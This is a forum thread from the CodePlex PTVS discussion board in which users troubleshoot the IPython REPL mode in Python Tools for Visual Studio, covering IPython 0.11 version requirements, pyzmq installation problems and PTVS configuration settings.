minimum_pyzmq_version = "2.1.4" ' ' try: ' import zmq ' except ImportError: ' raise ImportError("IPython.zmq requires pyzmq >= %s"%minimum_pyzmq_version) ' ' pyzmq_version = "2.1.4" #zmq.__version__ ' ' if pyzmq_version < minimum_pyzmq_version: ' raise ImportError("IPython.zmq requires pyzmq >= %s, but you have %s"%( ' minimum_pyzmq_version, pyzmq_version)) the issue is that 2.1.10 < 2.1.4, I hardcoded this to pass and now it works. Ciao I had the same issues. I've installed the pyzmq and did the version rename, but after entering an command into the VS REPL the process doesn't return (waitcursor). Im running Win7 x64, PyTools 1.1 alpha, VS2010 SP1 and a bunch of other extensions. Any hints? asqui wrote: Yeah, I held off on that because the latest version didn't have a binary distribution for python 2.6 but I've now installed a slightly older 'pyzmq-2.1.4.win32-py2.6.msi' and it all works fine. Thanks! I also had the same problem and getting that same pyzmq binary installer seems to have fixed it. I wasn't sure should I start a new thread or put it here. So I put it here. I've installed: PTVS 1.5 Beta 1.msi python 2.7.3 win32 ipython 0.13 py2 win32 pyzmq 2.2.0 win32 (tried 2.1.4 too) When I launch test file in python interactive shell I get an error The Python REPL process has exitedTraceback (most recent call last): File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_py_repl.py", line 1092, in <module> _run_repl() File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_py_repl.py", line 1076, in _run_repl BACKEND = backend_type(launch_file=options.launch_file) File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_ipython_repl.py", line 158, in __init__ self.km.start_kernel(**{'ipython': True, 'extra_arguments': self.get_extra_arguments()}) File "D:\Tools\Python\Python27_86\lib\site-packages\IPython\zmq\kernelmanager.py", line 806, in start_kernel self.kernel = launch_kernel(fname=self.connection_file, **kw) File "D:\Tools\Python\Python27_86\lib\site-packages\IPython\zmq\ipkernel.py", line 869, in launch_kernel *args, **kwargs) TypeError: base_launch_kernel() got an unexpected keyword argument 'ipython' UPDATE: Have tried PVTS 1.1.1 with no luck too Tiphon, Sorry for the slow response time - This looks like this is a breaking change in IPython .13. To work around this you can remove "'ipython': True," from "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_ipython_repl.py" on line 158. I've pinged the IPython team and opened an issue so that we can fix this and support IPython .11 - .13 at same time. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://pytools.codeplex.com/discussions/254221
CC-MAIN-2016-50
refinedweb
1,634
60.92
On Fri, 2004-09-10 at 04:51, Ajay wrote: > Quoting Uche Ogbuji <uche.ogbuji at fourthought.com>: > > > On Wed, 2004-09-08 at 22:34, Ajay wrote: > > > hi! > > > > > > > > > Quoting Alan Kennedy <alanmk at hotmail.com>: > > > > > > > [Ajay] > > > > > i have tried the archives now and heaps of Google searches but am > > no > > > > closer > > > > > to finding out what the error is. > > > > > > > > > > the error does not appear if i use expat. > > > > > > > > and > > > > > > > > >>i am parsing the attached document. > > > > >>the code is > > > > >>parser = make_parser('xml.sax.drivers2.drv_xmlproc') > > > > >>ruleSet = parse(ruleSetFile, parser=parser) > > > > You've got some odd code here. The following works for me (no errors): > > > > >>> from xml.sax import make_parser > > >>> parser = make_parser('xml.sax.drivers2.drv_xmlproc') > > >>> ruleSet = parser.parse("foo.xml") > > > > Where "foo.xml" is the file I pasted in from your message. > > i should have put my import statements. i am actually trying to use minidom > with xmlproc. thus the code really is > from xml.dom.minidom import parse > from xml.sax import make_parser > > parser=make_parser('xml.sax.drivers2.drv_xmlproc') > ruleSet = parse('foo.xml', parser=parser) > > this throws the error i described earlier for the document which i also > posted earlier. > > so what am i doing wrong? I don't think you're doing anything especially wrong. This looks like a bug in pulldom. Seems as though it can't handle "global" attributes when fed from parsers that don't report namespace prefix mappings. IOW, <p3p:PURPOSE appel: ^^^^^^ breaks in this case. This will probably require some work in PullDOM to address :-( Man, you seem to have the worst luck here. -- -
https://mail.python.org/pipermail/xml-sig/2004-September/010589.html
CC-MAIN-2019-51
refinedweb
260
71.71
Talk:Network principles From OLPC I think it is very important to emphasize that relying on IPv4 or IPv6 routability means that deployments can improve network conditions independent of changes to the software on the XO. --Michael Stone 15:47, 28 April 2008 (EDT) "fake friends" == "strangers"? I believe that the term "strangers" better describes what you mean by "fake friends"; the latter incorporates a sense of "deception" where someone pretends to be a friend. Instead you probably refer to users that happen to be physically around and I would assume those to be plain strangers, unless otherwise decided by the user. --Ypod 00:26, 29 April 2008 (EDT) - You're totally right. The only problem with "strangers" is that it doesn't quite capture the idea that these may be people you know, they're just not guaranteed to be. But "strangers" is much better than "fake friends"; I've made the change. CScott 12:22, 9 May 2008 (EDT) First comments from Ben Network Principles: "Additional servers may be used as aides or proxies, but the fundamental means to query the state of an XO or to collaborate with its user is to directly connect to it." What does "fundamental" mean? Perhaps you mean "most direct"? - I've changed it to "canonical". Other means are optimizations only; they don't need to work. CScott 12:22, 9 May 2008 (EDT) "By direct communication we mean the standard socket API and IP protocols on which the internet is built." You seem to be implying that the standard protocols are preferred, but mesh multicast (especially cerebro's implementation) is a clear example in which the standard protocols are not preferred. - Again, mesh multicast should be viewed as an optimization, not a core feature. Everything should work (albeit at reduced efficiency) even without such tricks. Mesh multicast doesn't actually work across the broader internet, so it's not a good primitive on which to base the design. ("Standard" multicast also doesn't really work across the broader internet -- at least not w/o manual configuration.) CScott 12:22, 9 May 2008 (EDT) Direct presence interrogation: "The fundamental presence mechanism is direct: one XO connects directly to a service running on the other and queries for its status" Again, I think you want "simplest", as your subsequent algorithm makes clear that this is not the recommended method (piggybacking and lazy presence being preferred, and active interrogation being used only when presence info times out). - "canonical", again. Other mechanisms are optimizations. Sure, use an optimization if you can, but you should be able to work w/o them. CScott 12:22, 9 May 2008 (EDT) "most users have 20 or so friends" I have about 200 buddies on my AIM buddy list. I glanced through my friends on facebook; they often have 600-900 friends (at 98, I am considered an ultraminimalist). Facebook provides constant high-bandwidth presence for all of them, which is only possible due to its centralized, lazy, aggregating architecture. On myspace, the numbers run into the many thousands. We should expect users to behave similarly with our presence service. We should also remember that the presence service bandwidth will only increase, due to strongly desired features like photo buddy icons and live previews of shared activities. The bandwidth will be much lower than Facebook's, but also much larger than the current Presence Service. "The key point is that all hosts should support direct interrogation for presence, even if other efficient mechanisms are used for partial aggregate presence in some situations." OK, though I think you have your emphasis backwards. - "Premature optimization is the root of all evil", etc, etc. Many of our networking scenarios don't actually need heroic measures. CScott 12:22, 9 May 2008 (EDT) "Our principles above dictate that collaboration mechanisms are built using direct peer-to-peer communication." Umm... except in the case of talking to a user in Google Chat, or any other legacy IM tunneled over Jabber. Now you're using peer-to-peer to mean client-to-server, just like you were complaining about before. Also, "principles" sounds like this is a moral issue; it's not. Finally, what about a wiki? - "Principles" is meant to suggest these are not absolute rules, but rather guidelines (ie, that it's not a moral issue). Communicating with non-XOs is at the mercy of the legacy bits, I can't force Google Chat to decentralize. Wikis are really interesting cases. MikMik is an example of a true peer-to-peer wiki, consistent with this document's recommendations. Note that, as this document recommends, it *can* use a server to help it scale, but doesn't *need* a server. CScott 12:22, 9 May 2008 (EDT) "Friends are represented internally using the domain name only; there is no "user@" portion." This would make it impossible to be friends with someone on Google Chat. There is no need for this restriction. The domain name can only be "unnecessary" if the user name happens to be "xo", and I hardly see the value of saving 3 characters ("xo@") in an internal representation. . Ben 00:30, 29 April 2008 (EDT) Friending (Poly) Scott wrote: ." I think there is a distinct difference between "friending" in the context of social networking sites (facebook, myspace) and the network created by the XOs: the former by definition urges users to increasing their social connectivity by adding new "friends", whereas the latter does not provide a "friend" recommendation mechanism and there is no third party (like facebook) that facilitates fast "friending" growth. As a result, friending done using the XOs might be better representation of the actual friend networks among children with relatively fewer edges. - My point is, Facebook actually _does_ represent an accurate model of friend networks, because most people really do know over 1000 other people well enough to want to know what they're doing. Also, IM is a closer analogy to friending in Sugar, and the number of people on AIM buddy lists is often in hundreds as well. This is despite the fact that adding someone in your buddy list requires typing in a unique textual identifier (their screen name), and the system provides no discovery mechanism. This is even true on ICQ, where the unique identifier is not human-readable. If our discovery mechanisms are nonexistent, we can expect users to have dozens of friends. If our discovery mechanisms are good, we can expect hundreds. Ben 10:34, 29 April 2008 (EDT) However, I still think that relying on the fact that a child will have few friends so as not to overload the network with presence queries is a sub-optimal approach, not only because may actually end-up having as many "friends" as they would on Facebook, but also because maintaining up-to-date information only about your friends and having no information (what their profile is, what activities they're sharing) about "strangers" will be boring. If you actually have such information about strangers (assuming that no internet connection/xmpp server is available), then why do you need to query your friends on a different basis? Again, I will elaborate more on this on a separate stub. In response to Ben's comment: . I think your concern of services corresponding to well-known ports is valid. I would like to generalize the problem though to the case where activities need to be identified and need to communicate from one XO to another: How do activities get identified? By some unique (per activity) id? By some string name? I will write my thoughts on this on a separate stub. --Ypod 01:24, 29 April 2008 (EDT) On Presence updates/User Profiles/Collaboration On_Presence_updates/User_Profiles/Collaboration --Ypod 03:37, 29 April 2008 (EDT) Anything unique to a communications path (e.g., the mesh) ? Reading the topic 'Direct XO-to-XO peer communication', I saw that you are NOT making any distinction among the paths (e.g., direct mesh vs. through school relay_server vs through internet) used to access the other XO. The target XO either is present, or is not. If the target XO can be reached via multiple routes, a suitable one will be chosen. Aside from those "under the covers" protocols which handle the mesh communication itself, is there any need for Activities (or Users) to be cognizant that they are interacting over the "mesh" rather than the "internet" ? [And apart from a possible role in "discovering" the names of potential correspondents, is the 'Jabber server' needed any more?] Daf's thoughts - I agree with Ypod's suggestion of saying "strangers" rather than "fake friends". - Things I like: - Maintaining a distinction between OLPC and deployment responsibilities. - The separation of discovery, presence and collaboration, and the acknowledgement that protocols sometimes do discovery and presence simultaneously. - "Human-readable names promote compatibility with other network hosts". I don't understand this phrase. - I've edited this paragraph. I'm talking about interoperation with non-XOs and with legacy software on an XO. - We should say why we want names to be concise. Is it so that they can be typed in? So that they don't take a lot of bandwidth when transmitted? - I'm not convinced by the "logical" part. If we really want names to encode particular information (name, country, school etc.) then we should say up front that the name should encode that information in the principles document. I think "meaningful" is a better name than "logical" for this property. - I think it's more clearly desirable that names are memorable. By "memorable", I mean something like: having seen the name, one can later input it from memory. - Even allowing for allowing the name part to be input/displayed as unicode rather than punycode, I don't think the proposed DNS scheme will be memorable due to the inclusion of the key hash. I don't think it will be particularly concise. - Zooko's triangle applies; I think it's worth citing it. We already acknowledge that picking secure/meaningful implies centralisation. - Yes, I cited it; no, centralization is not necessary. I provide an option: use centralized delegation of namespace to schoolservers to allow localized uniqueness checks; or else use "enough" randomness in the name chosen to ensure decentralized probabalistic uniqueness. We recommend that schoolservers be "centrally" given good names, which makes our names more "memorable". CScott 12:39, 9 May 2008 (EDT) - "By direct communication we mean the standard socket API and IP protocols on which the internet is built." When we say "IP protocols", are we talking about IPv4 and IPv6, or TCP and UDP, or application protocols? - I more-or-less mean that an application should be able to use the standard IPv4/IPv6 socket API and get something that works. We will, of course, build higher-layer abstractions on top of that, but you shouldn't *need* to use the abstractions in order to connect to an XO. Help clarifying the wording is welcome. CScott 12:39, 9 May 2008 (EDT) - "Our principles above dictate that collaboration mechanisms are built using direct peer-to-peer communication." I don't understand which principles this statement follows from. - "To manage this case, we strictly limit the rate and size of presence queries." Have we considered also limiting the number of strangers we try to talk to? If we try to poll everybody possible, then the poll interval for each contact becomes long. - I considered this, but I think slowing down is vastly preferable to selecting an arbitrary subset of the strangers. If I know I'm sitting next to someone, how do I guarantee I'll see that person in my subset? The only reasonable subsetting mechanism I can think of is tied to distance: if my friend doesn't show up, I just need to move closer to them. That seems reasonably intuitive -- but the distance metrics we get from the RF hardware bear a poor relationship to real-world distances, so the intuition breaks down. CScott 12:39, 9 May 2008 (EDT) - This is a problem that troubled me a lot in the past. Long delays vs. presence of large numbers of nodes. First I think we should do our best by minimizing the cost of adding information about more nodes. At the very least should have a linear cost and each node should account to a minimum cost (forget about colors, nicks, etc). I agree that distance is the first way to filter out nodes once we reach a limit in delays. What is more interesting though, would be to give our users the ability to make their own budget on the timeshare they have available. If we hit an upper limit at 500 nodes for example, we should allow the user to make a presence budget like: - 400 nodes: choose the shortest physical distance - 80 nodes: choose any of my friends (starting from the closest ones), irrespective of distance - 20 nodes: choose any of my friends' friends (two hops in social distance) - I envision that in the long run much of the social network rules ("I hate this guy" etc) should be imposed on the mesh network itself. --Ypod 17:22, 12 May 2008 (EDT) - "There are three main ways in which direct XO-to-XO communication fails". I think this is better stated as two ways: because a NAT is present, or because a firewall is present. NATs block inbound connections as a (desired or undesired) side-effect of the job they perform. Blocking of connections by a firewall is not a side-effect but by design. Many NATs provide (standard or de facto standard) means of opening ports to the outside world, and we should consider using these means so as to be able to help deployments where the use of a NAT is outside of their control. Of course, if more than one person behind a NAT wishes to export the same service, then they need to use a different port which necessitates some sort of out-of-band means of communicating that port. Also, actively communicating with NATs to negotiate port forwarding (as opposed to circumventing the NAT without it cooperation) tends to not work when there are multiple layers of NAT. - Why are "Direct XO-to-XO peer communication" and "Direct presence interrogation" separate principles? The latter seems to me to be a subset of the former. - I don't see a rationale for why communciations should be are direct. There are lots of reasons why we might want to communicate directly, but we should state which ones are important to us. - "Although the name is a direct reference to the machine, the mapping from name to routable address is indirect." I find this statement very confusing. It's making some distinction between direct and indirect that I can't fathom. The statement "The key property is that there is a single name by which anyone anywhere on the network uses to refer to a particular XO -- the names do not depend on the means by which the name is mapped to an address, route or service" later in the same paragraph is quite clear, but I don't understand its connection to the direct/indirect distinction. - The architecture proposal doesn't describe a presence interrogation mechanism. - We should consider having a push mechanism as well as a pull mechanism. This saves unnecessary presence polls. A simple way to do this would be to maintain a connection to everybody you want presence notifications from. Presence notifications can be rate-limited on the sending side. Assuming the overhead of maintaining a connection is low, it shouldn't be any more expensive than polling. This is somewhat similar to how Jabber servers implement presence updates. - Yes, this is (part of) how an on-laptop XMPP server would work. I'll describe this more fully after I've proof-of-concept-implemented it. CScott 12:39, 9 May 2008 (EDT) - I disagree with maintaining long-lived connections. The cost of a single connection may be low, but having tens or hundreds of them may impose significant overhead. Not to mention the cost of re-establishing TCP connections (did you have TCP in mind?) in a mobile mesh network. I do agree though that there should also be a push mechanism, but I see no reason why it should be connection-based. --Ypod 17:37, 12 May 2008 (EDT) — Daf 18:30, 7 May 2008 (EDT) - What about centrally defined groups - e.g. created by a teacher? How could those be created, and updated? Does that require a server, or can we do it with xmpp: links? - The relevant XMPP spec has a way to add a friend in a certain group, but omits mention of creating a group with multiple friends at once. At the moment, I'd say the scope of this proposal is primarily concerned with defining how these buddies are represented; centrally-managed groups have been discussed via Moodle and a Jabber Server, and both seem to be reasonable. CScott 17:03, 22 November 2008 (UTC) - With rate-limited presence updates on the scale proposed, I think showing the active activity in mesh view becomes less useful as it becomes less accurate. This clustering around the active shared activity was part of the original design, according to Eben. - If the network has capacity, the rate-limiting won't be visible. This proposal is primarily about separating out the pieces so that collaboration and presence can be implemented and improved separately, and so failure or degradation in the presence service doesn't prevent collaboration. CScott 17:03, 22 November 2008 (UTC) - "xo@" -- not to optimise prematurely, but what about non-XO Sugar instances? While I can't quickly think of an alternative short name, something more generic than "xo" might be more appropriate. - I chose 'xo' primarily because it was short and semi-meaningful. I'm not terribly attached to it. Non-XO instances should be free to use 'sugar@' or 'fedora@' or 'classmate@' (but their users will have to type a bit more) or just 'a@'; it shouldn't matter at all to interop. If someone can think of a alternative short pithy name, I'm all for it. CScott 17:03, 22 November 2008 (UTC) --morgs 16:58, 12 May 2008 (EDT) XO-to-XO security +1 to this approach. Not only do I agree with an approach that resembles ssh as much as posible, but it also allows to encapsulate traditional IP-based communication over a network where IP address were never assigned or used! This very important for communication _within_ a mesh network. To explain this further, I could access by capturing all IP traffic locally and encapsulating it into frames that are routed using the underlying mesh routing protocol. If we're not going to use IP for routing within the mesh network while we are backwards compatible with IP-based applications, I no longer see a reason why we need IP addresses within the mesh (except maybe for the MPP that acts as an internet gateway) --Ypod 20:05, 28 June 2008 (UTC) TODO As I understand it (big caveat), this is what needs to be done to implement the Network Principles: 1) get the "XO-name" into Sugar - python algorithm for deriving the name - identify where it's stored - identify how it can be managed 2) run "External DNS" server - decide on its TLD - run it - enable dyndns updates sanely 3) get "XO-name" (dyn)dns updates into distros 4) get "XO-name" dns resolution into distros 5) implement new URI scheme for friends - teach Browse about it - teach any other interesting apps (gtk text widgets?) 6) get per-XO XMPP presence service into distros MartinDengler 09:31, 21 October 2009 (UTC)
http://wiki.laptop.org/index.php?title=Talk:Network_principles&oldid=221443
CC-MAIN-2015-35
refinedweb
3,307
60.85
On Mon, Aug 18, 2003 at 06:43:20PM +0100, Bruce Stephens wrote: > > 4. A lot of documentation talks about people making new repositories > > each year because old ones get "big" > > It's the number of revisions, I suspect. Actually I think it's meant to address namespace pollution. If you're a good arch user and make branches out the wazoo, you may end up with a lot of dead-end branches, and maybe categories of failed projects, etc. They don't really interfere that much (unless for some reason you want to re-use a branch name or something, and don't like the idea of bumping the version), but do clutter things up, abrowse output, etc. [As far as I can see, moving to a new archive doesn't affect the way revisions are applied at all; if you don't add some cached versions, it will happily go back to the old archive and apply revisions from there!] I also think that it may simply be a good habit to at least occasionally move your archive -- it forces you to put in place the tools/whatever to make such a move possible, so if there comes a time when you're _forced_ to move you're in a better position. Some reasons you might be forced to move: (1) your email address changes, so the one in the archive name is bogus (it's just a string, but personally I don't want to publicize an obsolute email address), (2) your old archive becomes too big for any existing disk (you hacker stud!).... :-] -Miles -- A zen-buddhist walked into a pizza shop and said, "Make me one with everything."
http://lists.gnu.org/archive/html/gnu-arch-users/2003-08/msg00047.html
CC-MAIN-2015-35
refinedweb
283
66.81
UFDC Home myUFDC Home | Help | RSS <%BANNER%> TABLE OF CONTENTS HIDE Main Main: Around Levy County Main: Opinion Main: Around Levy County conti... Main: Around Levy County conti... Main: Sports and Recreation Main: Around Levy County conti... Main continued Main: Classified and Legals Main: Around the Courthouse Main continued Main: Around Levy County conti...: November96 Table of Contents Main page 1 Main: Around Levy County page 2 page 3 Main: Opinion page 4 Main: Around Levy County continued page 5 page 6 Main: Around Levy County continued page 7 Main: Sports and Recreation page 8 page 9 page 10 page 11 page 12 page 13 Main: Around Levy County continued page 14 Main continued page 15 Main: Classified and Legals page 16 page 17 Main: Around the Courthouse page 18 page 19 Main continued page 20 Main: Around Levy County continued page 21 Main continued page 22 Full Text SVY COUNTY JOURT. NA L E^E COUNTY PAE E S W. 19 23 VOL. 83, NO. 19 THURSDAY, NOVEMBER 16,20061 SECTION: 22 PAGES 50 cents per copy City says 'nyet' to police requests The Colors of Autumn Save a life--your own. Quit today. Page 14 Treat Yourself Page 14 OBITUARIES I * Mary Bilbrey Freddy Davidson III Shirley Eberle Margaret Fulmer Mary Goddard Annie Grisham Fannie Holmes Carla Swails Bobbe Williams CONTENTS... 1 Around Levy Opinion Law & Courts Levy History Ohituaripe Sports Tides l icfci d Legals Land Transacti Marketplace BY CASSIE JOURNIGAN STAFF WRITER CHIEFLAND-Chiefland's police force may soon increase by two if commissioners grant chief Robert Douglas his request. Douglas based his need on "annexation and growth-we have 45 new businesses." He added, "I realize this costs money but to respond quickly, we have to have manpower. The city is now five miles long and two and a half miles wide. We need new officers as soon as we can get them." Projected cost of the two new spots stands at approximately $88,500. Commissioners also vigorously debated a nuisance ordinance designed to give lawmakers the ability to seize property from repeat offenders. The ordinance would set up a board authorized to impose fines for activities ranging from drug sale to prostitution, criminal street gang activity and stolen property crimes. As the ordinance is now drafted, property can be seized when an offense is repeated twice within a six- monthperiod. Commissioners Teresa Barron, Rollin Hudson and Teal Pomeroy expressed fear that the two-time cut- off could create hardship for innocent victims. "I'd hate to see an elderly person whose'grandson is selling drugs without them knowing it have their house taken," Hudson said. Barron opted for leniency. "I'd like to have it more like five than two," she said, referring to the two times in six months. Alice Monyei favored the draft as written. "I say two. They're going to know what this ordinance says," she said, referring to repeat offenders and their knowledge of the nuisance ordinance. "They're going to know they have three, or four more chances." Rollins said, "I'm not for doing something another agency, such as the justice See Police Page 22 2-3,5, 6, 13 4 5 5 7 8-13 12 16 16-17 ons 17-18 20-21 Journal photo by Cassie Journigan PURVEYOR OF FRESH fruits and vegetables April Williams readies her produce forwhat she hopes will be a bumper crop of customers. 1 r School board considers shortfall BY CASSIE JOURNIGAN STAFF WRITER BRONSON-School board members learned details of a funding shortage during their Nov. 7 meeting. Finance direc- tor Bob Clemons said the shortage was due to diminished numbers of students registering this year. He said the district is short 114 students from what was forecast. Funds are ex- pected to have a total shortfall of $612,982. Clemons said he and superintendent CliffNorris were currently making budget cuts. Clemons said he had requested bids on interest rates to meet the December payroll. Norris recognized Yankeetown principal Ann Hayes for completion in the principal leadership academy. Several other principals and assistants are currently in training through the program. School board personnel director Candy Dean said salary negotiations recently conducted will result in a 7.54 percent increase. The increase includes an insurance increase that the board is picking up. The increases were approved unanimous- ly after a motion was made by Jennefer Shuster and seconded by Frank Etheridge. See School Page 22 HOME OF... * - Journal pnoto Dy Neal I-Isner THE WILLISTON Red Devils advanced in the playoffs. The team takes on Eustis Friday. See Page 8 for details. Apartments Torie Hill of Williston > zOF r- 0 or .- "j-n :. 2-1 get first nod BY CASSIE JOURNIGAN STAFF WRITER SWILLISTON-WIIJsTON IS A STEP COSER TO BEING HOME TO A NEW 30-UNIT APARTMENT COMPLEX. ROSWELL DEVELOPMENT GROUP IS PROPOSING TO BUIID THE AP ARIMENIS ON THE CORNER OF SW Fl1STAVENUE AND NE 11 STREET. WITHLACOOCHEE REGIONAL PLANNING COUNCIL MEMBER JASON GAICIA SPOKE TO CITY COUNCIL MEMBERS DURING THEIR NOV. 7 MEETING AND ENCOURAGED COUNCIL 10 IOOK TOWARD flEXIBIE LAND USES AND INfiLL DEVELOPMENT AND THEN TO CHANGE THE ZONING FROM IHE CUIPENT fiVE ACRES 1T ONE AND See Housing Page 22 REACH US I Managing Editor Carolyn RIsner Phone 13521490-4462 Journal photo by Carolyn Risner VETERANS WERE saluted across the county Saturday. For more on the weekend's activities, see pages 6 and 15. Fax (352 400-4490 Chlefland (352) 486-5042 Bronson Email edltor@VlewoumarLom Address P.O. Box 159 Bronsn, R 32621-0159 P.O. Box 2990 Chlelnd. R 32844-2990 SUBSCRIBE Levy, Dixie and Gllchrlst counties $17 In-stale $22 Out of state $27 Locally owned and operated! The Levy County Journal believes In good stewardship of the land. That's why we print on 100 percent recycled newsprint. Protecting our future TODAYI INSIDE * v ........ I ~uaw unr~pMI~IB~"~O~-`~ I1Lkob. ~d~l~E~l(1 LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006 Funds available to cattlemen for drought relief Florida Agriculture and Consumer Services Commis- sioner Charles H. Bronson today announced that Florida has been allocated $149,705 in federal funding to imple- ment a Livestock Assistance Grant Program. The funding will assist agricultural pro- ducers in their recovery from last spring and summer's drought. "Our department is pleased to work with USDA in this program to help our produc- ers pro- gram, using the U.S. Drought Monitors from March 7 to Velvet beans: Crop, not plot This is not a 21st century . Communist plot; it's a crop in early 20th century Levy County. The workers and bean plants pictured above will be in the upcoming book Levy County: Voices From the Past if someone identifies the men. Will any of your fam- ily pictures and stories be in the book? Photographs and memories are now being col- lected. Make sure your memo- ries and those of others in your family will be included. Guidelines may be picked up in any-Levy County library. Send your information to Levy Book, P.O. Box 402, Morriston FL 32668 or e-mail themtoshp.levybook@yahoo. com. Questions? For answers, e-mail or call Drollene Brown at (352) 465- 4862. Don't delay! Deadline is Dec. 15, 2006. Aug. 31, 2006, as the basis for the selection. Any coun- ties that were classified as being in D-3 or D-4 drought during that timeframe were included. The counties are: Bay, Escambia, Holmes, Jackson, Okaloosa, Santa Rosa, Walton and Washing- ton. Commercial farmers or ranchers with beef cattle, farmed bison, dairy cattle, sheep, or goats that suffered forage production losses are eligible for assistance. To receive funding, eli- gible producers will need to complete a self-certification application that provides the maximum number of eligible livestock that were on site be- tween March 7 and Aug. 31, 2006. This application also has a section that requires producers to estimate live- stock-related, expenses in- curred because of decreased forage supplies related to the 2006 drought. These ex- penses could include loss of forage production, costs of supplemental feed, cost of relocating cattle to new feed sources, increased feed trans- portation costs, and emergen- cy water supply needs. Pro- ducers will not receive more relief than their losses. Pay- ments are subject to tax. Producers must complete the application for assistance so that it is received by the Florida Department of Agri- culture and Consumer Ser- vices by 5 p.m. Jan. 31, 2007, or be postmarked by that date. ,Applications and other information about the pro- gram will be available Dec. 1, 2006, from a number of sources, including: -- Online at. doacs.state.fl.us/ai/ under Announcements, "Livestock Assistance Grant Program." -- University of Florida IFAS Extension offices lo- cated in qualified counties in Florida. -- Industry organizations: Florida Farm Bureau, Flori- da Cattlemen's Association, Southeast Milk Incorporated, Florida Dairy Goat Associa- tion, Meat Sheep Alliance of Florida, Florida Meat Goat Association. -- Farm Service Agency offices located in qualified counties in Florida. Completed applications should be mailed to, and any questions directed to, the Florida Department of Agri- culture and Consumer Ser- vices at: Division of Animal Indus- try Attn: Livestock Assistance Grant Program 407 South Calhoun Street, Mail Stqp M7 Mayo Building, Room 323 Tallahassee, FL 32399- 0800 Telephone: (850) 410- 0900; Fax: (850) 410-0915 S~z I I TWO FARM workers surro a FAVOR hosts first Forever Wild speakers FAVOR, Friends and Volunteers of Ref- uges, Lower Suwannee and Cedar Keys NWR present the first in the series of For- ever Wild speakers. The speakers, Jennifer Staiger and Jamie Barichivich will speak on their research on the Lower Suwannee National Wildlife Refuge. Their goal is to monitor amphibian populations on federal lands and to evaluate potential causes of decline. In response to global declines and threats to the amphibians and reptiles, the US gov- ernment implemented the National Amphib- ian Research and Monitoring Research ini- tiative in 2000. Jennifer S. Staiger, who was born and reared in Florida and received her undergradu- ate degree in environmental studies at Rollins College and a master's degree in wildlife ecol- ogy and conservation from UF, along with Ja- mie Barichivich, who received his degrees in wildlife ecology at UF, have been conducting research on these animals in the Lower Suwan- nee NWR. The program will be on Nov. 18 at 11 a.m. in the Cedar Key Public Library, 466 2nd St. in Cedar Key. All ages will enjoy this interesting talk on snakes and other reptiles in our area. The meeting is free and open to the public, and coffee and pastries will be served. Call Joan Stephens 352-463-1095 for more information. Thursday, Nov. 16 > Great American Smokeout, All day. l.SRWMD, Mayo, 8:30 a.m. History gathering, Williston Library, 10 a.m. STransportation board, Williston, 10 a.m. l.Exceptional Parents meeting, Bronson, 6 p.m. SOmbudsman Council, 12:30 Friday, Nov. 17 -VFW sale, Chiefland, 9 a.m. Saturday, Nov. 18 > Church yard sale, Bronson, 7:30 a.m. >Toys for Tots Bike Ride, Chiefland, 10 a.m. SCraft sale, Crystal River, 9 a.m. >Thanksgiving dinner, Bronson, 11 a.m. Tuesday, Nov. 21 >GOP dinner, Yankeetown 6 p.m. > Free dinner, Chiefland, 6 p.m. Friday, Nov. 24 l Quilt show, Chiefland, 8 a.m. Monday, Nov. 27 SGOP, Chiefland, 6:30 p.m. Thursday, Nov. 30 Tourism meeting, Bronson, 6 p.m. SMusic at the library, Williston, 7 p.m. Saturday, Dec. 9 SBasket auction, Williston, 10 a.m. Detailed descriptions of these events are contained elsewhere in the Levy County Journal. Tourism board to meet The Levy County Tourist Development Council will meet on Thursday, Nov. 30, 2006 at 6 p.m. at 380 South Court St., Bronson, Florida Levy County Planning and Attorney Conference Room.. VFW Auxiliary plans sale The Ladies Auxiliary of the VFW is holding a combination craft sale, baked goods and rummage sale on Friday, Nov. 17 and Saturday, Nov. 18 at the VFW Post, 1104 S. Main St., Chiefland beginning at 9.a.m. Cane grinding at Dudley set Dudley Farm Historic State Park Annual Cane Grinding Day will be held on Saturday, Dec. 2, from 9 a.m.-2 p.m. It is free admission. For more information, call 352-472-1142. Page 2 Perkins State Bank Now Offers SNo Minimum Balance Required SNo Monthly Fees PLUS State of the Art Banking Services PERKINS STATE BANK Williston Chiefland 4 Inglis Bronson Archer 528-3101 493-0447 447-4242 486-1182 495-9944 I LEVY COUNTY JOURNAL AROUND LEVY COUNTY Hayes completes Leadership Academy Ann Hayes, Principal of Yankeetown School, was rec- ognized at the Nov. 7 meet- ing of the School Board of Levy County for completing the Tier II Principals Leader- ship Academy. The North East Florida Educational Consortium (NEFEC) established the Principals Leadership Acad- emy to provide professional development for school prin- cipals at all levels of experi- ence. The Tier II Academy, funded through' the state's DELTA (Developing Educa- tional Leadership for Tomor- row's Achievers) program, Focuses on training for expe- rienced principals. Principal Hayes was one of the pilot group of 25 principals select- ed in July 2005 to participate in the program. "This was a great learn- ing experience. It gave me the opportunity to look at everything from a different perspective. It also gave me the opportunity to meet with other principals and learn from them," said Hayes. I Principals who apply for the Academy must submit evidence of effective per- formance evaluations, and evidence of leadership ini- tiatives in their schools that demonstrate student gains. The district superintendent and staff then review appli- cations. The superintendent recommends suitable candi- dates to the NEFEC Board of Directors, which makes the Church Churches plan Thanksgivng dinner The Beyond The Walls ministry of ,Bronsoni. ANN HAYES, Principal of Yankeetown School, cen- ter, displays the plaque she received in recogni- tion of her completion of the Principals Leadership Academy program. With her are Jennefer Shuster, school board member representing the Inglis/Yan- keetown area and Superintendent Clifton V. Norris. final selection. Training includes topics such as: data analysis and the continuous improvement model; prioritizing, map- ping, and monitoring the cur- riculum; giving leadership to literacy; school vision and culture; and building partner- ships for high performance learning. In addition to attending these training, participants must also complete a port- folio that demonstrates ap- plication of the knowledge gained. Commenting oh Hayes' "graduation," Superinten- dent Clifton V. Norris said, "Ann Hayes is an excellent principal, and now, with the skills she has gained through this program, she is going to provide an even higher level of instructional leadership." Hayes, a resident of Crys- tal River, has been principal at Yankeetown School for seven years. Previously, she was a teacher/administrative assistant at the 